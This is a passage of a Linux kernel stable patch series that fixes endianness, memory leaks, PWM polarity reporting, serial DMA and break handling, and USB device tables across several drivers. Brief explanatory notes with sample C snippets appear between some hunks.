+-	for (i = 0; i < task->request_pl_sz / sizeof(u32); i++)
++	for (i = 0; i < task->request_pl_sz / sizeof(__le32); i++)
+ 		pci_write_config_dword(pdev, offset + PCI_DOE_WRITE,
+-				       task->request_pl[i]);
++				       le32_to_cpu(task->request_pl[i]));
+ 
+ 	pci_doe_write_ctrl(doe_mb, PCI_DOE_CTRL_GO);
+ 
+@@ -195,11 +195,11 @@ static int pci_doe_recv_resp(struct pci_doe_mb *doe_mb, struct pci_doe_task *tas
+ 
+ 	/* First 2 dwords have already been read */
+ 	length -= 2;
+-	payload_length = min(length, task->response_pl_sz / sizeof(u32));
++	payload_length = min(length, task->response_pl_sz / sizeof(__le32));
+ 	/* Read the rest of the response payload */
+ 	for (i = 0; i < payload_length; i++) {
+-		pci_read_config_dword(pdev, offset + PCI_DOE_READ,
+-				      &task->response_pl[i]);
++		pci_read_config_dword(pdev, offset + PCI_DOE_READ, &val);
++		task->response_pl[i] = cpu_to_le32(val);
+ 		/* Prior to the last ack, ensure Data Object Ready */
+ 		if (i == (payload_length - 1) && !pci_doe_data_obj_ready(doe_mb))
+ 			return -EIO;
+@@ -217,13 +217,14 @@ static int pci_doe_recv_resp(struct pci_doe_mb *doe_mb, struct pci_doe_task *tas
+ 	if (FIELD_GET(PCI_DOE_STATUS_ERROR, val))
+ 		return -EIO;
+ 
+-	return min(length, task->response_pl_sz / sizeof(u32)) * sizeof(u32);
++	return min(length, task->response_pl_sz / sizeof(__le32)) * sizeof(__le32);
+ }
+ 
+ static void signal_task_complete(struct pci_doe_task *task, int rv)
+ {
+ 	task->rv = rv;
+ 	task->complete(task);
++	destroy_work_on_stack(&task->work);
+ }
+ 
+ static void signal_task_abort(struct pci_doe_task *task, int rv)
+@@ -317,14 +318,16 @@ static int pci_doe_discovery(struct pci_doe_mb *doe_mb, u8 *index, u16 *vid,
+ {
+ 	u32 request_pl = FIELD_PREP(PCI_DOE_DATA_OBJECT_DISC_REQ_3_INDEX,
+ 				    *index);
++	__le32 request_pl_le = cpu_to_le32(request_pl);
++	__le32 response_pl_le;
+ 	u32 response_pl;
+ 	DECLARE_COMPLETION_ONSTACK(c);
+ 	struct pci_doe_task task = {
+ 		.prot.vid = PCI_VENDOR_ID_PCI_SIG,
+ 		.prot.type = PCI_DOE_PROTOCOL_DISCOVERY,
+-		.request_pl = &request_pl,
++		.request_pl = &request_pl_le,
+ 		.request_pl_sz = sizeof(request_pl),
+-		.response_pl = &response_pl,
++		.response_pl = &response_pl_le,
+ 		.response_pl_sz = sizeof(response_pl),
+ 		.complete = pci_doe_task_complete,
+ 		.private = &c,
+@@ -340,6 +343,7 @@ static int pci_doe_discovery(struct pci_doe_mb *doe_mb, u8 *index, u16 *vid,
+ 	if (task.rv != sizeof(response_pl))
+ 		return -EIO;
+ 
++	response_pl = le32_to_cpu(response_pl_le);
+ 	*vid = FIELD_GET(PCI_DOE_DATA_OBJECT_DISC_RSP_3_VID, response_pl);
+ 	*protocol = FIELD_GET(PCI_DOE_DATA_OBJECT_DISC_RSP_3_PROTOCOL,
+ 			      response_pl);
+@@ -520,6 +524,8 @@ EXPORT_SYMBOL_GPL(pci_doe_supports_prot);
+  * task->complete will be called when the state machine is done processing this
+  * task.
+  *
++ * @task must be allocated on the stack.
++ *
+  * Excess data will be discarded.
+  *
+  * RETURNS: 0 when task has been successfully queued, -ERRNO on error
+@@ -533,15 +539,15 @@ int pci_doe_submit_task(struct pci_doe_mb *doe_mb, struct pci_doe_task *task)
+ 	 * DOE requests must be a whole number of DW and the response needs to
+ 	 * be big enough for at least 1 DW
+ 	 */
+-	if (task->request_pl_sz % sizeof(u32) ||
+-	    task->response_pl_sz < sizeof(u32))
++	if (task->request_pl_sz % sizeof(__le32) ||
++	    task->response_pl_sz < sizeof(__le32))
+ 		return -EINVAL;
+ 
+ 	if (test_bit(PCI_DOE_FLAG_DEAD, &doe_mb->flags))
+ 		return -EIO;
+ 
+ 	task->doe_mb = doe_mb;
+-	INIT_WORK(&task->work, doe_statemachine_work);
++	INIT_WORK_ONSTACK(&task->work, doe_statemachine_work);
+ 	queue_work(doe_mb->work_queue, &task->work);
+ 	return 0;
+ }
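The DOE fix above is an endianness one: payload buffers become __le32 and every crossing of the config-space boundary converts explicitly, so the mailbox also works on big-endian hosts (and sparse can now flag u32/__le32 mixups). The idiom in isolation ('val' and 'buf' are illustrative):

/* Keep wire-format payloads in __le32 and convert only at the
 * hardware boundary.
 */
__le32 buf[4];			/* payload stays little-endian in memory */
u32 val = 0xdeadbeef;

buf[0] = cpu_to_le32(val);	/* CPU-native -> wire, before writing */
val = le32_to_cpu(buf[0]);	/* wire -> CPU-native, after reading  */
/* on little-endian CPUs both conversions compile to nothing */
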
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index 74af3e593b2ca..336b9029d1515 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -920,7 +920,7 @@ static ssize_t display_name_show(struct kobject *kobj, struct kobj_attribute *at
+ static ssize_t current_value_show(struct kobject *kobj, struct kobj_attribute *attr, char *buf)
+ {
+ 	struct tlmi_attr_setting *setting = to_tlmi_attr_setting(kobj);
+-	char *item, *value;
++	char *item, *value, *p;
+ 	int ret;
+ 
+ 	ret = tlmi_setting(setting->index, &item, LENOVO_BIOS_SETTING_GUID);
+@@ -930,10 +930,15 @@ static ssize_t current_value_show(struct kobject *kobj, struct kobj_attribute *a
+ 	/* validate and split from `item,value` -> `value` */
+ 	value = strpbrk(item, ",");
+ 	if (!value || value == item || !strlen(value + 1))
+-		return -EINVAL;
+-
+-	ret = sysfs_emit(buf, "%s\n", value + 1);
++		ret = -EINVAL;
++	else {
++		/* On Workstations remove the Options part after the value */
++		p = strchrnul(value, ';');
++		*p = '\0';
++		ret = sysfs_emit(buf, "%s\n", value + 1);
++	}
+ 	kfree(item);
++
+ 	return ret;
+ }
+ 
+@@ -1457,10 +1462,10 @@ static int tlmi_analyze(void)
+ 			 * name string.
+ 			 * Try and pull that out if it's available.
+ 			 */
+-			char *item, *optstart, *optend;
++			char *optitem, *optstart, *optend;
+ 
+-			if (!tlmi_setting(setting->index, &item, LENOVO_BIOS_SETTING_GUID)) {
+-				optstart = strstr(item, "[Optional:");
++			if (!tlmi_setting(setting->index, &optitem, LENOVO_BIOS_SETTING_GUID)) {
++				optstart = strstr(optitem, "[Optional:");
+ 				if (optstart) {
+ 					optstart += strlen("[Optional:");
+ 					optend = strstr(optstart, "]");
+@@ -1469,6 +1474,7 @@ static int tlmi_analyze(void)
+ 							kstrndup(optstart, optend - optstart,
+ 									GFP_KERNEL);
+ 				}
++				kfree(optitem);
+ 			}
+ 		}
+ 		/*
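On Lenovo workstations the BIOS setting string carries an option list after the value, so current_value_show() now truncates at the first ';'. A worked sketch of the parse; the sample string is invented, not real firmware output:

/* Parsing "Item,Value;[Optional:...]" as the fix does; strchrnul()
 * returns the terminating NUL when no ';' exists, so plain
 * "Item,Value" strings pass through unchanged.
 */
char item[] = "WakeOnLAN,Enable;[Optional:Enable,Disable]";
char *value = strpbrk(item, ",");	/* -> ",Enable;[Optional:...]" */

if (value && value != item && strlen(value + 1)) {
	char *p = strchrnul(value, ';');
	*p = '\0';			/* keep just ",Enable" */
	/* value + 1 is now "Enable" */
}
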
+diff --git a/drivers/pwm/pwm-cros-ec.c b/drivers/pwm/pwm-cros-ec.c
+index 86df6702cb835..ad18b0ebe3f1e 100644
+--- a/drivers/pwm/pwm-cros-ec.c
++++ b/drivers/pwm/pwm-cros-ec.c
+@@ -198,6 +198,7 @@ static int cros_ec_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	state->enabled = (ret > 0);
+ 	state->period = EC_PWM_MAX_DUTY;
++	state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	/*
+ 	 * Note that "disabled" and "duty cycle == 0" are treated the same. If
+diff --git a/drivers/pwm/pwm-hibvt.c b/drivers/pwm/pwm-hibvt.c
+index 12c05c155cab0..1b9274c5ad872 100644
+--- a/drivers/pwm/pwm-hibvt.c
++++ b/drivers/pwm/pwm-hibvt.c
+@@ -146,6 +146,7 @@ static int hibvt_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	value = readl(base + PWM_CTRL_ADDR(pwm->hwpwm));
+ 	state->enabled = (PWM_ENABLE_MASK & value);
++	state->polarity = (PWM_POLARITY_MASK & value) ? PWM_POLARITY_INVERSED : PWM_POLARITY_NORMAL;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/pwm/pwm-iqs620a.c b/drivers/pwm/pwm-iqs620a.c
+index 4987ca940b648..01208c2f58843 100644
+--- a/drivers/pwm/pwm-iqs620a.c
++++ b/drivers/pwm/pwm-iqs620a.c
+@@ -126,6 +126,7 @@ static int iqs620_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	mutex_unlock(&iqs620_pwm->lock);
+ 
+ 	state->period = IQS620_PWM_PERIOD_NS;
++	state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/pwm/pwm-meson.c b/drivers/pwm/pwm-meson.c
+index 16d79ca5d8f53..5cd7b90872c62 100644
+--- a/drivers/pwm/pwm-meson.c
++++ b/drivers/pwm/pwm-meson.c
+@@ -162,6 +162,12 @@ static int meson_pwm_calc(struct meson_pwm *meson, struct pwm_device *pwm,
+ 	duty = state->duty_cycle;
+ 	period = state->period;
+ 
++	/*
++	 * Note this is wrong. The result is an output wave that isn't really
++	 * inverted and so is wrongly identified by .get_state as normal.
++	 * Fixing this needs some care however as some machines might rely on
++	 * this.
++	 */
+ 	if (state->polarity == PWM_POLARITY_INVERSED)
+ 		duty = period - duty;
+ 
+@@ -358,6 +364,8 @@ static int meson_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		state->duty_cycle = 0;
+ 	}
+ 
++	state->polarity = PWM_POLARITY_NORMAL;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pwm/pwm-sprd.c b/drivers/pwm/pwm-sprd.c
+index d866ce345f977..bde579a338c27 100644
+--- a/drivers/pwm/pwm-sprd.c
++++ b/drivers/pwm/pwm-sprd.c
+@@ -109,6 +109,7 @@ static int sprd_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	duty = val & SPRD_PWM_DUTY_MSK;
+ 	tmp = (prescale + 1) * NSEC_PER_SEC * duty;
+ 	state->duty_cycle = DIV_ROUND_CLOSEST_ULL(tmp, chn->clk_rate);
++	state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	/* Disable PWM clocks if the PWM channel is not in enable state. */
+ 	if (!state->enabled)
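The PWM hunks in this series share one theme: .get_state() must fill in every field of pwm_state, including polarity, or the core may act on stale data; hardware that cannot invert simply reports PWM_POLARITY_NORMAL. A hedged skeleton (driver name and foo_* register helpers are invented):

/* Minimal .get_state() after this series: all fields initialized. */
static int foo_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
			     struct pwm_state *state)
{
	state->enabled = foo_read_enabled(chip, pwm->hwpwm);
	state->period = foo_read_period_ns(chip, pwm->hwpwm);
	state->duty_cycle = foo_read_duty_ns(chip, pwm->hwpwm);
	state->polarity = PWM_POLARITY_NORMAL;	/* hw can't invert */

	return 0;
}
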
+diff --git a/drivers/scsi/iscsi_tcp.c b/drivers/scsi/iscsi_tcp.c
+index 0454d94e8cf0d..e7a6fc01d9ca8 100644
+--- a/drivers/scsi/iscsi_tcp.c
++++ b/drivers/scsi/iscsi_tcp.c
+@@ -768,13 +768,12 @@ static int iscsi_sw_tcp_conn_set_param(struct iscsi_cls_conn *cls_conn,
+ 		iscsi_set_param(cls_conn, param, buf, buflen);
+ 		break;
+ 	case ISCSI_PARAM_DATADGST_EN:
+-		iscsi_set_param(cls_conn, param, buf, buflen);
+-
+ 		mutex_lock(&tcp_sw_conn->sock_lock);
+ 		if (!tcp_sw_conn->sock) {
+ 			mutex_unlock(&tcp_sw_conn->sock_lock);
+ 			return -ENOTCONN;
+ 		}
++		iscsi_set_param(cls_conn, param, buf, buflen);
+ 		tcp_sw_conn->sendpage = conn->datadgst_en ?
+ 			sock_no_sendpage : tcp_sw_conn->sock->ops->sendpage;
+ 		mutex_unlock(&tcp_sw_conn->sock_lock);
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 02913cc75195b..901c5c8035ef2 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -3607,6 +3607,7 @@ skip_dpc:
+ probe_failed:
+ 	qla_enode_stop(base_vha);
+ 	qla_edb_stop(base_vha);
++	vfree(base_vha->scan.l);
+ 	if (base_vha->gnl.l) {
+ 		dma_free_coherent(&ha->pdev->dev, base_vha->gnl.size,
+ 				base_vha->gnl.l, base_vha->gnl.ldma);
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index beba8f38b3dcb..d006467ec7843 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -1896,6 +1896,17 @@ EXPORT_SYMBOL_GPL(serial8250_modem_status);
+ static bool handle_rx_dma(struct uart_8250_port *up, unsigned int iir)
+ {
+ 	switch (iir & 0x3f) {
++	case UART_IIR_THRI:
++		/*
++		 * Postpone the DMA-or-not decision to IIR_RDI or
++		 * IIR_RX_TIMEOUT because it's impossible to make an informed
++		 * decision about that with IIR_THRI.
++		 *
++		 * This also fixes one known DMA Rx corruption issue where
++		 * DR is asserted but DMA Rx only gets a corrupted zero byte
++		 * (too early DR?).
++		 */
++		return false;
+ 	case UART_IIR_RDI:
+ 		if (!up->dma->rx_running)
+ 			break;
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 812216b24db81..59c10bceebbef 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -832,11 +832,17 @@ static unsigned int lpuart32_tx_empty(struct uart_port *port)
+ 			struct lpuart_port, port);
+ 	unsigned long stat = lpuart32_read(port, UARTSTAT);
+ 	unsigned long sfifo = lpuart32_read(port, UARTFIFO);
++	unsigned long ctrl = lpuart32_read(port, UARTCTRL);
+ 
+ 	if (sport->dma_tx_in_progress)
+ 		return 0;
+ 
+-	if (stat & UARTSTAT_TC && sfifo & UARTFIFO_TXEMPT)
++	/*
++	 * LPUART Transmission Complete Flag may never be set while queuing a break
++	 * character, so avoid checking for transmission complete when UARTCTRL_SBK
++	 * is asserted.
++	 */
++	if ((stat & UARTSTAT_TC && sfifo & UARTFIFO_TXEMPT) || ctrl & UARTCTRL_SBK)
+ 		return TIOCSER_TEMT;
+ 
+ 	return 0;
+@@ -2890,7 +2896,7 @@ static bool lpuart_uport_is_active(struct lpuart_port *sport)
+ 	tty = tty_port_tty_get(port);
+ 	if (tty) {
+ 		tty_dev = tty->dev;
+-		may_wake = device_may_wakeup(tty_dev);
++		may_wake = tty_dev && device_may_wakeup(tty_dev);
+ 		tty_kref_put(tty);
+ 	}
+ 
+diff --git a/drivers/tty/serial/sh-sci.c b/drivers/tty/serial/sh-sci.c
+index 7bd0807209299..caa09a0c48f45 100644
+--- a/drivers/tty/serial/sh-sci.c
++++ b/drivers/tty/serial/sh-sci.c
+@@ -31,6 +31,7 @@
+ #include <linux/ioport.h>
+ #include <linux/ktime.h>
+ #include <linux/major.h>
++#include <linux/minmax.h>
+ #include <linux/module.h>
+ #include <linux/mm.h>
+ #include <linux/of.h>
+@@ -2864,6 +2865,13 @@ static int sci_init_single(struct platform_device *dev,
+ 			sci_port->irqs[i] = platform_get_irq(dev, i);
+ 	}
+ 
++	/*
++	 * The fourth interrupt on the SCI port is the transmit end
++	 * interrupt, so shuffle the interrupts.
++	 */
++	if (p->type == PORT_SCI)
++		swap(sci_port->irqs[SCIx_BRI_IRQ], sci_port->irqs[SCIx_TEI_IRQ]);
++
+ 	/* The SCI generates several interrupts. They can be muxed together or
+ 	 * connected to different interrupt lines. In the muxed case only one
+ 	 * interrupt resource is specified as there is only one interrupt ID.
+@@ -2929,7 +2937,7 @@ static int sci_init_single(struct platform_device *dev,
+ 	port->flags		= UPF_FIXED_PORT | UPF_BOOT_AUTOCONF | p->flags;
+ 	port->fifosize		= sci_port->params->fifosize;
+ 
+-	if (port->type == PORT_SCI) {
++	if (port->type == PORT_SCI && !dev->dev.of_node) {
+ 		if (sci_port->reg_size >= 0x20)
+ 			port->regshift = 2;
+ 		else
+diff --git a/drivers/usb/cdns3/cdnsp-ep0.c b/drivers/usb/cdns3/cdnsp-ep0.c
+index d63d5d92f2554..f317d3c847810 100644
+--- a/drivers/usb/cdns3/cdnsp-ep0.c
++++ b/drivers/usb/cdns3/cdnsp-ep0.c
+@@ -414,7 +414,7 @@ static int cdnsp_ep0_std_request(struct cdnsp_device *pdev,
+ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ {
+ 	struct usb_ctrlrequest *ctrl = &pdev->setup;
+-	int ret = 0;
++	int ret = -EINVAL;
+ 	u16 len;
+ 
+ 	trace_cdnsp_ctrl_req(ctrl);
+@@ -424,7 +424,6 @@ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ 
+ 	if (pdev->gadget.state == USB_STATE_NOTATTACHED) {
+ 		dev_err(pdev->dev, "ERR: Setup detected in unattached state\n");
+-		ret = -EINVAL;
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index a23ddbb819795..560793545362a 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -49,6 +49,7 @@
+ #define PCI_DEVICE_ID_INTEL_RPLS		0x7a61
+ #define PCI_DEVICE_ID_INTEL_MTLM		0x7eb1
+ #define PCI_DEVICE_ID_INTEL_MTLP		0x7ec1
++#define PCI_DEVICE_ID_INTEL_MTLS		0x7f6f
+ #define PCI_DEVICE_ID_INTEL_MTL			0x7e7e
+ #define PCI_DEVICE_ID_INTEL_TGL			0x9a15
+ #define PCI_DEVICE_ID_AMD_MR			0x163a
+@@ -474,6 +475,9 @@ static const struct pci_device_id dwc3_pci_id_table[] = {
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLP),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
++	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLS),
++	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
++
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTL),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index fb988e4ea9244..6db07ca419c31 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -771,12 +771,11 @@ static struct pci_driver xhci_pci_driver = {
+ 	/* suspend and resume implemented later */
+ 
+ 	.shutdown = 	usb_hcd_pci_shutdown,
+-	.driver = {
+ #ifdef CONFIG_PM
+-		.pm = &usb_hcd_pci_pm_ops,
+-#endif
+-		.probe_type = PROBE_PREFER_ASYNCHRONOUS,
++	.driver = {
++		.pm = &usb_hcd_pci_pm_ops
+ 	},
++#endif
+ };
+ 
+ static int __init xhci_pci_init(void)
+diff --git a/drivers/usb/host/xhci-tegra.c b/drivers/usb/host/xhci-tegra.c
+index bdb776553826b..32df571bb2339 100644
+--- a/drivers/usb/host/xhci-tegra.c
++++ b/drivers/usb/host/xhci-tegra.c
+@@ -1225,6 +1225,9 @@ static void tegra_xhci_id_work(struct work_struct *work)
+ 
+ 	mutex_unlock(&tegra->lock);
+ 
++	tegra->otg_usb3_port = tegra_xusb_padctl_get_usb3_companion(tegra->padctl,
++								    tegra->otg_usb2_port);
++
+ 	if (tegra->host_mode) {
+ 		/* switch to host mode */
+ 		if (tegra->otg_usb3_port >= 0) {
+@@ -1339,9 +1342,6 @@ static int tegra_xhci_id_notify(struct notifier_block *nb,
+ 	}
+ 
+ 	tegra->otg_usb2_port = tegra_xusb_get_usb2_port(tegra, usbphy);
+-	tegra->otg_usb3_port = tegra_xusb_padctl_get_usb3_companion(
+-							tegra->padctl,
+-							tegra->otg_usb2_port);
+ 
+ 	tegra->host_mode = (usbphy->last_event == USB_EVENT_ID) ? true : false;
+ 
+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index 2b280beb00115..c02ad4f76bb3c 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -9,6 +9,7 @@
+  */
+ 
+ #include <linux/pci.h>
++#include <linux/iommu.h>
+ #include <linux/iopoll.h>
+ #include <linux/irq.h>
+ #include <linux/log2.h>
+@@ -228,6 +229,7 @@ int xhci_reset(struct xhci_hcd *xhci, u64 timeout_us)
+ static void xhci_zero_64b_regs(struct xhci_hcd *xhci)
+ {
+ 	struct device *dev = xhci_to_hcd(xhci)->self.sysdev;
++	struct iommu_domain *domain;
+ 	int err, i;
+ 	u64 val;
+ 	u32 intrs;
+@@ -246,7 +248,9 @@ static void xhci_zero_64b_regs(struct xhci_hcd *xhci)
+ 	 * an iommu. Doing anything when there is no iommu is definitely
+ 	 * unsafe...
+ 	 */
+-	if (!(xhci->quirks & XHCI_ZERO_64B_REGS) || !device_iommu_mapped(dev))
++	domain = iommu_get_domain_for_dev(dev);
++	if (!(xhci->quirks & XHCI_ZERO_64B_REGS) || !domain ||
++	    domain->type == IOMMU_DOMAIN_IDENTITY)
+ 		return;
+ 
+ 	xhci_info(xhci, "Zeroing 64bit base registers, expecting fault\n");
+@@ -4406,6 +4410,7 @@ static int __maybe_unused xhci_change_max_exit_latency(struct xhci_hcd *xhci,
+ 
+ 	if (!virt_dev || max_exit_latency == virt_dev->current_mel) {
+ 		spin_unlock_irqrestore(&xhci->lock, flags);
++		xhci_free_command(xhci, command);
+ 		return 0;
+ 	}
+ 
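device_iommu_mapped() is true even for passthrough setups, so the xhci change above tightens the guard: zeroing the 64-bit base registers is only attempted when the controller sits behind a translating IOMMU domain that would actually catch the expected faults. The check in isolation (dev is the sysdev, as in the hunk):

/* Only proceed when a translating domain protects the device; an
 * identity (passthrough) domain leaves stray DMA unchecked.
 */
struct iommu_domain *domain = iommu_get_domain_for_dev(dev);

if (!domain || domain->type == IOMMU_DOMAIN_IDENTITY)
	return;		/* no translation: leave the registers alone */
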
+diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
+index 832ad592b7ef3..cdea1bff3b708 100644
+--- a/drivers/usb/serial/cp210x.c
++++ b/drivers/usb/serial/cp210x.c
+@@ -120,6 +120,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x10C4, 0x826B) }, /* Cygnal Integrated Products, Inc., Fasttrax GPS demonstration module */
+ 	{ USB_DEVICE(0x10C4, 0x8281) }, /* Nanotec Plug & Drive */
+ 	{ USB_DEVICE(0x10C4, 0x8293) }, /* Telegesis ETRX2USB */
++	{ USB_DEVICE(0x10C4, 0x82AA) }, /* Silicon Labs IFS-USB-DATACABLE used with Quint UPS */
+ 	{ USB_DEVICE(0x10C4, 0x82EF) }, /* CESINEL FALCO 6105 AC Power Supply */
+ 	{ USB_DEVICE(0x10C4, 0x82F1) }, /* CESINEL MEDCAL EFD Earth Fault Detector */
+ 	{ USB_DEVICE(0x10C4, 0x82F2) }, /* CESINEL MEDCAL ST Network Analyzer */
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index e6d8d9b35ad0e..f31cc3c763299 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -1198,6 +1198,8 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM520N, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, 0x0900, 0xff, 0, 0), /* RM500U-CN */
++	  .driver_info = ZLP },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200U, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200S_CN, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200T, 0xff, 0, 0) },
+@@ -1300,6 +1302,14 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = NCTRL(0) | RSVD(1) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1075, 0xff),	/* Telit FN990 (PCIe) */
+ 	  .driver_info = RSVD(0) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1080, 0xff),	/* Telit FE990 (rmnet) */
++	  .driver_info = NCTRL(0) | RSVD(1) | RSVD(2) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1081, 0xff),	/* Telit FE990 (MBIM) */
++	  .driver_info = NCTRL(0) | RSVD(1) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1082, 0xff),	/* Telit FE990 (RNDIS) */
++	  .driver_info = NCTRL(2) | RSVD(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1083, 0xff),	/* Telit FE990 (ECM) */
++	  .driver_info = NCTRL(0) | RSVD(1) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_ME910),
+ 	  .driver_info = NCTRL(0) | RSVD(1) | RSVD(3) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_ME910_DUAL_MODEM),
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index 50b24096eb7f1..0ea50b44effe2 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -112,8 +112,12 @@ static int dp_altmode_configure(struct dp_altmode *dp, u8 con)
+ 		if (dp->data.status & DP_STATUS_PREFER_MULTI_FUNC &&
+ 		    pin_assign & DP_PIN_ASSIGN_MULTI_FUNC_MASK)
+ 			pin_assign &= DP_PIN_ASSIGN_MULTI_FUNC_MASK;
+-		else if (pin_assign & DP_PIN_ASSIGN_DP_ONLY_MASK)
++		else if (pin_assign & DP_PIN_ASSIGN_DP_ONLY_MASK) {
+ 			pin_assign &= DP_PIN_ASSIGN_DP_ONLY_MASK;
++			/* Default to pin assign C if available */
++			if (pin_assign & BIT(DP_PIN_ASSIGN_C))
++				pin_assign = BIT(DP_PIN_ASSIGN_C);
++		}
+ 
+ 		if (!pin_assign)
+ 			return -EINVAL;
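With multiple DP-only pin assignments on offer, the altmode driver now defaults to assignment C (four DP lanes) rather than whichever bit happens to survive the mask. A worked example of the selection; the starting mask is illustrative:

/* Offering both C and E: the added preference collapses the mask
 * to C alone. DP_PIN_ASSIGN_* are the spec-defined bit positions.
 */
u32 pin_assign = BIT(DP_PIN_ASSIGN_C) | BIT(DP_PIN_ASSIGN_E);

pin_assign &= DP_PIN_ASSIGN_DP_ONLY_MASK;
if (pin_assign & BIT(DP_PIN_ASSIGN_C))
	pin_assign = BIT(DP_PIN_ASSIGN_C);	/* prefer 4-lane C */
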
+diff --git a/fs/cifs/fs_context.c b/fs/cifs/fs_context.c
+index 6d13f8207e96a..ace11a1a7c8ab 100644
+--- a/fs/cifs/fs_context.c
++++ b/fs/cifs/fs_context.c
+@@ -441,13 +441,14 @@ out:
+  * but there are some bugs that prevent rename from working if there are
+  * multiple delimiters.
+  *
+- * Returns a sanitized duplicate of @path. The caller is responsible for
+- * cleaning up the original.
++ * Returns a sanitized duplicate of @path. @gfp indicates the GFP_* flags
++ * for kstrdup.
++ * The caller is responsible for freeing the original.
+  */
+ #define IS_DELIM(c) ((c) == '/' || (c) == '\\')
+-static char *sanitize_path(char *path)
++char *cifs_sanitize_prepath(char *prepath, gfp_t gfp)
+ {
+-	char *cursor1 = path, *cursor2 = path;
++	char *cursor1 = prepath, *cursor2 = prepath;
+ 
+ 	/* skip all prepended delimiters */
+ 	while (IS_DELIM(*cursor1))
+@@ -469,7 +470,7 @@ static char *sanitize_path(char *path)
+ 		cursor2--;
+ 
+ 	*(cursor2) = '\0';
+-	return kstrdup(path, GFP_KERNEL);
++	return kstrdup(prepath, gfp);
+ }
+ 
+ /*
+@@ -531,7 +532,7 @@ smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx)
+ 	if (!*pos)
+ 		return 0;
+ 
+-	ctx->prepath = sanitize_path(pos);
++	ctx->prepath = cifs_sanitize_prepath(pos, GFP_KERNEL);
+ 	if (!ctx->prepath)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/cifs/fs_context.h b/fs/cifs/fs_context.h
+index 3de00e7127ec4..f4eaf85589022 100644
+--- a/fs/cifs/fs_context.h
++++ b/fs/cifs/fs_context.h
